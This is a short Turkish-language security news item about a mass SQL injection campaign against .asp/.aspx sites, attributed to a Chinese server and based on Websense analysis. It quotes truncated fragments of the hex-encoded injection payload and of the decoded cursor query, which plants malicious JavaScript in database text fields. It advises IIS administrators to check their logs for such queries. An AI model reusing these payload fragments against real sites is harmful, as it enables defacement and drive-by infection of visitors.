Bir Çin sunucusundan yayıldığı tespit edilen zararlı kodlar, içerisinde ’.gov.uk’ ve ’un.org’ uzantılı siteler de dahil olmak üzere yüzbinlerce siteyi etkilediği bildirildi. Websense’in yaptığı analize göre malware sekiz güvenlik açığını kullanıp sitelere bulaşmakta. Bunların içerisinde 2007 Şubat ayında yaması çıkan VML güvenlik açığıda bulunuyor. Bu demek oluyor ki birçok web sitesi güvenlik açıklarını takip etmiyor sonucunda ise bu tip saldırılara maruz kalıyor. Analizde saldırıların genellikle .asp ve .aspx uzantılı sitelere aşağıdakine benzer şifrelenmiş bir sql sorgusuyla yapıldığı belirtildi.
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004[...]
Bu sorgu sayfadaki tüm text alanlarını bulup içlerine zararlı javascript kodunu yerleştirmekte.
DECLARE @T varchar(255)’@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name’b.name from sysobjects a’syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b[...]
Çözüm olarak özellikle Microsoft IIS kullanan webmaster’ların log dosyalarında benzer sql sorguları var mı yok mu diye kontrol etmeleri öneriliyor.
